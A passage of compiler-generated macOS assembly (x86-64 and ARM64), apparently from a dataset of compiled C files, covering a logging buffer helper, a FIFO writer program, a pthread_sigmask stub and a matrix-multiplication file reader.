popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function add_to__printf_buf
_add_to__printf_buf: ## @add_to__printf_buf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movb %dil, %al
movb %al, -1(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movslq 512(%rax), %rax
cmpq $510, %rax ## imm = 0x1FE
jbe LBB17_2
## %bb.1:
movq -24(%rbp), %rax
movq 520(%rax), %rdi
movq -24(%rbp), %rsi
movq -24(%rbp), %rax
movl 512(%rax), %edx
callq _send_bytes_to_logging_sink
movq -24(%rbp), %rax
movl $0, 512(%rax)
LBB17_2:
movb -1(%rbp), %dl
movq -24(%rbp), %rax
movq -24(%rbp), %rsi
movl 512(%rsi), %ecx
movl %ecx, %edi
addl $1, %edi
movl %edi, 512(%rsi)
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
movq -24(%rbp), %rax
movq -24(%rbp), %rcx
movslq 512(%rcx), %rcx
movb $0, (%rax,%rcx)
movq -24(%rbp), %rax
movslq 512(%rax), %rax
cmpq $512, %rax ## imm = 0x200
setb %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB17_4
## %bb.3:
leaq L___func__.add_to__printf_buf(%rip), %rdi
leaq L_.str.1(%rip), %rsi
leaq L_.str.12(%rip), %rcx
movl $80, %edx
callq ___assert_rtn
LBB17_4:
jmp LBB17_5
LBB17_5:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function local_toupper
_local_toupper: ## @local_toupper
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %dil, %al
movb %al, -2(%rbp)
movsbl -2(%rbp), %eax
cmpl $97, %eax
jl LBB18_3
## %bb.1:
movsbl -2(%rbp), %eax
cmpl $122, %eax
jg LBB18_3
## %bb.2:
movsbl -2(%rbp), %eax
addl $-32, %eax
## kill: def $al killed $al killed $eax
movb %al, -1(%rbp)
jmp LBB18_4
LBB18_3:
movb -2(%rbp), %al
movb %al, -1(%rbp)
LBB18_4:
movsbl -1(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _VG_log_output_sink ## @VG_log_output_sink
.p2align 2
_VG_log_output_sink:
.long 2 ## 0x2
.byte 0 ## 0x0
.space 3
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "(null)"
L___func__.VG_vsprintf: ## @__func__.VG_vsprintf
.asciz "VG_vsprintf"
L_.str.1: ## @.str.1
.asciz "84370.c"
L_.str.2: ## @.str.2
.asciz "local_strlen(buf) == ret"
L_.str.3: ## @.str.3
.asciz "%%-%ds"
L_.str.4: ## @.str.4
.asciz "--%"
L_.str.5: ## @.str.5
.asciz "%lld%%"
L___func__.VG_percentify: ## @__func__.VG_percentify
.asciz "VG_percentify"
L_.str.6: ## @.str.6
.asciz "0"
L_.str.7: ## @.str.7
.asciz "%%lld.%%0%dlld%%%%"
.zerofill __DATA,__bss,_n_SP_updates_fast,4,2 ## @n_SP_updates_fast
.zerofill __DATA,__bss,_n_SP_updates_generic_known,4,2 ## @n_SP_updates_generic_known
.zerofill __DATA,__bss,_n_SP_updates_generic_unknown,4,2 ## @n_SP_updates_generic_unknown
L_.str.8: ## @.str.8
.asciz "translate: fast SP updates identified: %'u (%s)\n"
L_.str.9: ## @.str.9
.asciz "translate: generic_known SP updates identified: %'u (%s)\n"
L_.str.10: ## @.str.10
.asciz "translate: generic_unknown SP updates identified: %'u (%s)\n"
.section __TEXT,__const
l_.str.11: ## @.str.11
.space 512
.section __TEXT,__cstring,cstring_literals
L___func__.add_to__printf_buf: ## @__func__.add_to__printf_buf
.asciz "add_to__printf_buf"
L_.str.12: ## @.str.12
.asciz "b->buf_used < sizeof(b->buf)"
L_.str.13: ## @.str.13
.asciz "0123456789ABCDEF"
L_.str.14: ## @.str.14
.asciz "0123456789abcdef"
L_.str.15: ## @.str.15
.asciz "&"
L_.str.16: ## @.str.16
.asciz "<"
L_.str.17: ## @.str.17
.asciz ">"
.subsections_via_symbols
| the_stack_data/84370.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _alrm ; -- Begin function alrm
.p2align 2
_alrm: ; @alrm
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
adrp x8, _nid@GOTPAGE
ldr x8, [x8, _nid@GOTPAGEOFF]
ldr w0, [x8]
bl _close
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _unlink
mov w0, #0
bl _exit
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #1088
sub x8, x29, #32
str x8, [sp, #24] ; 8-byte Folded Spill
adrp x9, _nid@GOTPAGE
ldr x9, [x9, _nid@GOTPAGEOFF]
str x9, [sp, #32] ; 8-byte Folded Spill
stur wzr, [x29, #-20]
stur w0, [x29, #-24]
str x1, [x8]
ldr x8, [x8]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
stur wzr, [x29, #-36]
b LBB1_3
LBB1_2:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x8, [x8]
ldr x0, [x8, #8]
bl _atoi
stur w0, [x29, #-36]
b LBB1_3
LBB1_3:
mov w0, #14
adrp x1, _alrm@PAGE
add x1, x1, _alrm@PAGEOFF
bl _signal
ldur w0, [x29, #-36]
bl _alarm
subs w8, w0, #0
cset w8, hs
tbnz w8, #0, LBB1_5
b LBB1_4
LBB1_4:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _perror
mov w0, #-1
bl _exit
LBB1_5:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
mov w1, #4544
mov w2, #0
bl _mknod
ldr x8, [sp, #32] ; 8-byte Folded Reload
str w0, [x8]
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB1_9
b LBB1_6
LBB1_6:
bl ___error
ldr w8, [x0]
subs w8, w8, #17
cset w8, eq
tbnz w8, #0, LBB1_8
b LBB1_7
LBB1_7:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _perror
mov w0, #-1
bl _exit
LBB1_8:
b LBB1_9
LBB1_9:
mov x8, sp
; kill: def $x9 killed $xzr
str xzr, [x8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
mov w1, #1
bl _open
ldr x8, [sp, #32] ; 8-byte Folded Reload
str w0, [x8]
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB1_11
b LBB1_10
LBB1_10:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _perror
mov w0, #-1
bl _exit
LBB1_11:
b LBB1_12
LBB1_12: ; =>This Inner Loop Header: Depth=1
mov w0, #0
add x1, sp, #44
str x1, [sp, #8] ; 8-byte Folded Spill
mov x2, #1024
bl _read
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [sp, #8] ; 8-byte Folded Reload
ldr w8, [x8]
str w8, [sp, #20] ; 4-byte Folded Spill
bl _strlen
ldr x1, [sp, #8] ; 8-byte Folded Reload
mov x2, x0
ldr w0, [sp, #20] ; 4-byte Folded Reload
bl _write
b LBB1_12
.cfi_endproc
; -- End function
.comm _nid,4,2 ; @nid
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "dupa"
l_.str.1: ; @.str.1
.asciz "BLAD"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _alrm ## -- Begin function alrm
.p2align 4, 0x90
_alrm: ## @alrm
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movq _nid@GOTPCREL(%rip), %rax
movl (%rax), %edi
callq _close
leaq L_.str(%rip), %rdi
callq _unlink
xorl %edi, %edi
callq _exit
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $1072, %rsp ## imm = 0x430
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
cmpq $0, 8(%rax)
jne LBB1_2
## %bb.1:
movl $0, -20(%rbp)
jmp LBB1_3
LBB1_2:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
callq _atoi
movl %eax, -20(%rbp)
LBB1_3:
movl $14, %edi
leaq _alrm(%rip), %rsi
callq _signal
movl -20(%rbp), %edi
callq _alarm
cmpl $0, %eax
jae LBB1_5
## %bb.4:
leaq L_.str.1(%rip), %rdi
callq _perror
movl $-1, %edi
callq _exit
LBB1_5:
leaq L_.str(%rip), %rdi
movl $4544, %esi ## imm = 0x11C0
xorl %edx, %edx
callq _mknod
movq _nid@GOTPCREL(%rip), %rcx
movl %eax, (%rcx)
cmpl $0, %eax
jge LBB1_9
## %bb.6:
callq ___error
cmpl $17, (%rax)
je LBB1_8
## %bb.7:
leaq L_.str.1(%rip), %rdi
callq _perror
movl $-1, %edi
callq _exit
LBB1_8:
jmp LBB1_9
LBB1_9:
leaq L_.str(%rip), %rdi
movl $1, %esi
xorl %eax, %eax
movl %eax, %edx
movb $0, %al
callq _open
movq _nid@GOTPCREL(%rip), %rcx
movl %eax, (%rcx)
cmpl $0, %eax
jge LBB1_11
## %bb.10:
leaq L_.str.1(%rip), %rdi
callq _perror
movl $-1, %edi
callq _exit
LBB1_11:
jmp LBB1_12
LBB1_12: ## =>This Inner Loop Header: Depth=1
leaq -1056(%rbp), %rsi
xorl %edi, %edi
movl $1024, %edx ## imm = 0x400
callq _read
movq _nid@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl %eax, -1068(%rbp) ## 4-byte Spill
leaq -1056(%rbp), %rax
movq %rax, -1064(%rbp) ## 8-byte Spill
leaq -1056(%rbp), %rdi
callq _strlen
movl -1068(%rbp), %edi ## 4-byte Reload
movq -1064(%rbp), %rsi ## 8-byte Reload
movq %rax, %rdx
callq _write
jmp LBB1_12
.cfi_endproc
## -- End function
.comm _nid,4,2 ## @nid
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "dupa"
L_.str.1: ## @.str.1
.asciz "BLAD"
.subsections_via_symbols
| the_stack_data/25139176.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.comm __phy84752_ucode_c_not_empty,4,2 ; @_phy84752_ucode_c_not_empty
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.comm __phy84752_ucode_c_not_empty,4,2 ## @_phy84752_ucode_c_not_empty
.subsections_via_symbols
| the_stack_data/920711.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _pthread_sigmask ; -- Begin function pthread_sigmask
.p2align 2
_pthread_sigmask: ; @pthread_sigmask
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str w0, [sp, #28]
str x1, [sp, #16]
str x2, [sp, #8]
mov w0, #45
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _pthread_sigmask ## -- Begin function pthread_sigmask
.p2align 4, 0x90
_pthread_sigmask: ## @pthread_sigmask
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl $45, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/675931.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _read_file ; -- Begin function read_file
.p2align 2
_read_file: ; @read_file
.cfi_startproc
; %bb.0:
sub sp, sp, #176
.cfi_def_cfa_offset 176
stp x29, x30, [sp, #160] ; 16-byte Folded Spill
add x29, sp, #160
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #48] ; 8-byte Folded Spill
stur x0, [x29, #-8]
mov w8, #1
and w8, w1, w8
sturb w8, [x29, #-9]
ldur x0, [x29, #-8]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _fopen
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB0_2:
ldur x0, [x29, #-24]
mov x9, sp
sub x8, x29, #28
str x8, [x9]
sub x8, x29, #32
str x8, [x9, #8]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fscanf
subs w8, w0, #2
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB0_4:
ldurb w8, [x29, #-9]
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
ldur w8, [x29, #-28]
adrp x9, _a_row@GOTPAGE
ldr x9, [x9, _a_row@GOTPAGEOFF]
str w8, [x9]
ldur w8, [x29, #-32]
adrp x9, _a_col@GOTPAGE
ldr x9, [x9, _a_col@GOTPAGEOFF]
str w8, [x9]
b LBB0_9
LBB0_6:
ldur w8, [x29, #-28]
adrp x9, _b_row@GOTPAGE
ldr x9, [x9, _b_row@GOTPAGEOFF]
str w8, [x9]
ldur w8, [x29, #-32]
adrp x10, _b_col@GOTPAGE
ldr x10, [x10, _b_col@GOTPAGEOFF]
str w8, [x10]
adrp x8, _a_col@GOTPAGE
ldr x8, [x8, _a_col@GOTPAGEOFF]
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB0_8:
b LBB0_9
LBB0_9:
ldursw x8, [x29, #-28]
lsl x0, x8, #3
bl _malloc
stur x0, [x29, #-40]
stur wzr, [x29, #-44]
b LBB0_10
LBB0_10: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-44]
ldur w9, [x29, #-28]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_13
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_10 Depth=1
ldursw x8, [x29, #-32]
lsl x0, x8, #2
bl _malloc
ldur x8, [x29, #-40]
ldursw x9, [x29, #-44]
str x0, [x8, x9, lsl #3]
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_10 Depth=1
ldur w8, [x29, #-44]
add w8, w8, #1
stur w8, [x29, #-44]
b LBB0_10
LBB0_13:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-56]
adrp x8, l_.str.5@PAGE
add x8, x8, l_.str.5@PAGEOFF
stur x8, [x29, #-64]
stur xzr, [x29, #-72]
str wzr, [sp, #76]
b LBB0_14
LBB0_14: ; =>This Loop Header: Depth=1
; Child Loop BB0_17 Depth 2
; Child Loop BB0_24 Depth 3
ldr w8, [sp, #76]
ldur w9, [x29, #-28]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_37
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_14 Depth=1
ldur x2, [x29, #-24]
sub x0, x29, #56
sub x1, x29, #72
bl _getline
adds x8, x0, #1
cset w8, eq
tbnz w8, #0, LBB0_34
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_14 Depth=1
ldur x0, [x29, #-56]
ldur x1, [x29, #-64]
bl _strtok
str x0, [sp, #80]
str wzr, [sp, #72]
b LBB0_17
LBB0_17: ; Parent Loop BB0_14 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_24 Depth 3
ldr w8, [sp, #72]
ldur w9, [x29, #-32]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_33
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_17 Depth=2
ldr x8, [sp, #80]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_20
b LBB0_19
LBB0_19:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
ldr w8, [sp, #76]
mov w9, #1
str w9, [sp, #44] ; 4-byte Folded Spill
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fprintf
ldr w0, [sp, #44] ; 4-byte Folded Reload
bl _exit
LBB0_20: ; in Loop: Header=BB0_17 Depth=2
ldr x8, [sp, #80]
ldrsb w8, [x8]
subs w8, w8, #45
cset w8, eq
mov w9, #1
and w8, w8, w9
strb w8, [sp, #71]
ldrb w8, [sp, #71]
tbz w8, #0, LBB0_23
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_17 Depth=2
ldr x0, [sp, #80]
bl _strlen
subs x8, x0, #1
cset w8, ne
tbnz w8, #0, LBB0_23
b LBB0_22
LBB0_22:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
ldr w8, [sp, #76]
mov w9, #1
str w9, [sp, #40] ; 4-byte Folded Spill
add w11, w8, #1
ldr w8, [sp, #72]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
ldr w0, [sp, #40] ; 4-byte Folded Reload
bl _exit
LBB0_23: ; in Loop: Header=BB0_17 Depth=2
ldrb w8, [sp, #71]
and w8, w8, #0x1
str w8, [sp, #64]
b LBB0_24
LBB0_24: ; Parent Loop BB0_14 Depth=1
; Parent Loop BB0_17 Depth=2
; => This Inner Loop Header: Depth=3
ldrsw x8, [sp, #64]
str x8, [sp, #32] ; 8-byte Folded Spill
ldr x0, [sp, #80]
bl _strlen
ldr x8, [sp, #32] ; 8-byte Folded Reload
subs x8, x8, x0
cset w8, hs
tbnz w8, #0, LBB0_29
b LBB0_25
LBB0_25: ; in Loop: Header=BB0_24 Depth=3
ldr x8, [sp, #80]
ldrsw x9, [sp, #64]
ldrsb w0, [x8, x9]
bl _isdigit
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_27
b LBB0_26
LBB0_26:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
ldr w8, [sp, #76]
mov w9, #1
str w9, [sp, #28] ; 4-byte Folded Spill
add w11, w8, #1
ldr w8, [sp, #72]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
ldr w0, [sp, #28] ; 4-byte Folded Reload
bl _exit
LBB0_27: ; in Loop: Header=BB0_24 Depth=3
b LBB0_28
LBB0_28: ; in Loop: Header=BB0_24 Depth=3
ldr w8, [sp, #64]
add w8, w8, #1
str w8, [sp, #64]
b LBB0_24
LBB0_29: ; in Loop: Header=BB0_17 Depth=2
mov w8, #10
str w8, [sp, #60]
ldr w8, [sp, #64]
ldr w9, [sp, #60]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_31
b LBB0_30
LBB0_30:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
ldr w8, [sp, #76]
mov w9, #1
str w9, [sp, #24] ; 4-byte Folded Spill
add w11, w8, #1
ldr w8, [sp, #72]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
bl _fprintf
ldr w0, [sp, #24] ; 4-byte Folded Reload
bl _exit
LBB0_31: ; in Loop: Header=BB0_17 Depth=2
ldr x0, [sp, #80]
bl _atoi
ldur x8, [x29, #-40]
ldrsw x9, [sp, #76]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #72]
str w0, [x8, x9, lsl #2]
ldur x1, [x29, #-64]
mov x0, #0
bl _strtok
str x0, [sp, #80]
b LBB0_32
LBB0_32: ; in Loop: Header=BB0_17 Depth=2
ldr w8, [sp, #72]
add w8, w8, #1
str w8, [sp, #72]
b LBB0_17
LBB0_33: ; in Loop: Header=BB0_14 Depth=1
b LBB0_35
LBB0_34:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB0_35: ; in Loop: Header=BB0_14 Depth=1
b LBB0_36
LBB0_36: ; in Loop: Header=BB0_14 Depth=1
ldr w8, [sp, #76]
add w8, w8, #1
str w8, [sp, #76]
b LBB0_14
LBB0_37:
ldur x0, [x29, #-24]
bl _fclose
ldur x0, [x29, #-40]
ldp x29, x30, [sp, #160] ; 16-byte Folded Reload
add sp, sp, #176
ret
.cfi_endproc
; -- End function
.globl _mult_overflow ; -- Begin function mult_overflow
.p2align 2
_mult_overflow: ; @mult_overflow
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
stur w2, [x29, #-12]
stur w3, [x29, #-16]
ldur w8, [x29, #-4]
ldur w9, [x29, #-8]
mul w8, w8, w9
stur w8, [x29, #-20]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_3
b LBB1_1
LBB1_1:
ldur w8, [x29, #-20]
ldur w9, [x29, #-4]
sdiv w8, w8, w9
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur w8, [x29, #-12]
mov w9, #1
str w9, [sp, #24] ; 4-byte Folded Spill
add w11, w8, #1
ldur w8, [x29, #-16]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _fprintf
ldr w0, [sp, #24] ; 4-byte Folded Reload
bl _exit
LBB1_3:
ldur w0, [x29, #-20]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _add_overflow ; -- Begin function add_overflow
.p2align 2
_add_overflow: ; @add_overflow
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
stur w2, [x29, #-12]
stur w3, [x29, #-16]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB2_4
b LBB2_1
LBB2_1:
ldur w9, [x29, #-4]
mov w8, #2147483647
subs w8, w8, w9
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_3
b LBB2_2
LBB2_2:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur w8, [x29, #-12]
mov w9, #1
stur w9, [x29, #-20] ; 4-byte Folded Spill
add w11, w8, #1
ldur w8, [x29, #-16]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _fprintf
ldur w0, [x29, #-20] ; 4-byte Folded Reload
bl _exit
LBB2_3:
b LBB2_7
LBB2_4:
ldur w8, [x29, #-8]
ldur w10, [x29, #-4]
mov w9, #-2147483648
subs w9, w9, w10
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur w8, [x29, #-12]
mov w9, #1
str w9, [sp, #24] ; 4-byte Folded Spill
add w11, w8, #1
ldur w8, [x29, #-16]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _fprintf
ldr w0, [sp, #24] ; 4-byte Folded Reload
bl _exit
LBB2_6:
b LBB2_7
LBB2_7:
ldur w8, [x29, #-4]
ldur w9, [x29, #-8]
add w0, w8, w9
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _compute ; -- Begin function compute
.p2align 2
_compute: ; @compute
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
str x1, [sp, #32]
str x2, [sp, #24]
str wzr, [sp, #20]
b LBB3_1
LBB3_1: ; =>This Loop Header: Depth=1
; Child Loop BB3_3 Depth 2
; Child Loop BB3_5 Depth 3
ldr w8, [sp, #20]
adrp x9, _a_row@GOTPAGE
ldr x9, [x9, _a_row@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_12
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
str wzr, [sp, #16]
b LBB3_3
LBB3_3: ; Parent Loop BB3_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB3_5 Depth 3
ldr w8, [sp, #16]
adrp x9, _b_col@GOTPAGE
ldr x9, [x9, _b_col@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_10
b LBB3_4
LBB3_4: ; in Loop: Header=BB3_3 Depth=2
ldr x8, [sp, #24]
ldrsw x9, [sp, #20]
ldr x9, [x8, x9, lsl #3]
ldrsw x10, [sp, #16]
mov w8, #0
str w8, [x9, x10, lsl #2]
str wzr, [sp, #12]
b LBB3_5
LBB3_5: ; Parent Loop BB3_1 Depth=1
; Parent Loop BB3_3 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #12]
adrp x9, _a_col@GOTPAGE
ldr x9, [x9, _a_col@GOTPAGEOFF]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_8
b LBB3_6
LBB3_6: ; in Loop: Header=BB3_5 Depth=3
ldr x8, [sp, #40]
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #12]
ldr w8, [x8, x9, lsl #2]
ldr x9, [sp, #32]
ldrsw x10, [sp, #12]
ldr x9, [x9, x10, lsl #3]
ldrsw x10, [sp, #16]
ldr w9, [x9, x10, lsl #2]
mul w10, w8, w9
ldr x8, [sp, #24]
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
ldrsw x9, [sp, #16]
add x9, x8, x9, lsl #2
ldr w8, [x9]
add w8, w8, w10
str w8, [x9]
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_5 Depth=3
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB3_5
LBB3_8: ; in Loop: Header=BB3_3 Depth=2
b LBB3_9
LBB3_9: ; in Loop: Header=BB3_3 Depth=2
